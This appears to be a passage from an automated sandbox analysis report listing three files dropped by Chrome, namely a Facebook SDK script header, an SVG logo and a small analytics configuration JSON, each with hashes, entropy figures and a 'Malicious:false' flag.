                                                                                                          Entropy (8bit):5.458342101078307
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:9EF1AFE4B475A2807EED911A8F05257C
                                                                                                          SHA1:7597DA6344E15A0EE13308F17FEF7954ED78FC1F
                                                                                                          SHA-256:82ADAFD2815D9CA49A6771392B15C4C7683F0490A8825EAD54DD2D2594D44C62
                                                                                                          SHA-512:7D1FAF6995C3264D7BE3A18C3C3C47F744C4FE33F8BBC0B182DD3346EEC1FAB868839BD69441DCCA9675FE839FD4CA4F93330D5F89F72DBD3DFF4ED69960B300
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10592
                                                                                                          Entropy (8bit):4.048906808176457
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:12A3102D6CA2735204CFCD44DEB0258F
                                                                                                          SHA1:510F4FB5B013FB94C32D21A768E3A29A6003C484
                                                                                                          SHA-256:8343749A2DB88AC13B2137B39BBF79806CC4A72D12E4B0C3376FFB66F930A8E6
                                                                                                          SHA-512:F31A69CA3E8FDA6F185DCC37C458A10F4F57CA01D3EA5EC816F22708B03F4CC417ABA6ABFE1C4C9A64F14B512E3E4AC29ED9F49F6D87D80E3DD49E67F296CB0C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:<svg width="108" height="28" viewBox="0 0 108 28" fill="none" xmlns="http://www.w3.org/2000/svg">..<path d="M34.5896 24.1142V23.3056C34.1411 23.8689 33.2747 24.2808 32.2087 24.2808C31.0813 24.2808 30.1535 23.8992 29.4254 23.1542C28.7157 22.4061 28.3594 21.4158 28.3594 20.1832C28.3594 18.9475 28.7157 17.9572 29.4254 17.2122C30.1504 16.4642 31.0782 16.0856 32.2087 16.0856C33.2133 16.0856 33.9721 16.3612 34.4667 16.9245V12.2727H36.7094V24.1142H34.5896ZM30.6481 20.1832C30.6481 21.5702 31.4223 22.3637 32.5804 22.3637C33.7079 22.3637 34.4667 21.6157 34.4667 20.3528V20.0015C34.4667 18.7658 33.7079 17.9905 32.5804 17.9905C31.4192 17.9875 30.6481 18.7961 30.6481 20.1832Z" fill="white"/>..<path d="M46.4022 20.883H40.9123C40.9584 21.8733 41.5759 22.482 42.5805 22.482C43.3853 22.482 43.88 22.1913 44.0489 21.6128L46.3223 21.7188C46.184 22.4669 45.7662 23.0908 45.0689 23.5632C44.3899 24.0357 43.585 24.2779 42.6419 24.2779C41.4038 24.2779 40.3992 23.9115 39.6435 23.1665C38.8847 22.4184 38.516 21.4281
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):186
                                                                                                          Entropy (8bit):4.712496643099425
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:B6BA82C37C780E791616F8F4D5CA5772
                                                                                                          SHA1:EFA54D817926FA08DEAA77DB53DBD93521D97B39
                                                                                                          SHA-256:7B23628656640102C1C313D5CC07B5C4747AEBE0C14B8AA0F2B0773E5B0FD197
                                                                                                          SHA-512:0F91EBBA603879CCFE270DB25ADD89134FE8D36205F05683DF6272EA82FE017FF582D3F26D46F50F5483C2AF46E2686B66FEFD7944B583D93E99C56577EE67AF
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:{"config": {"enable_collect_everything": true}, "toolbarParams": {}, "isAuthenticated": false, "supportedCompression": ["gzip", "gzip-js"], "featureFlags": [], "sessionRecording": false}
                                                                                                          No static file info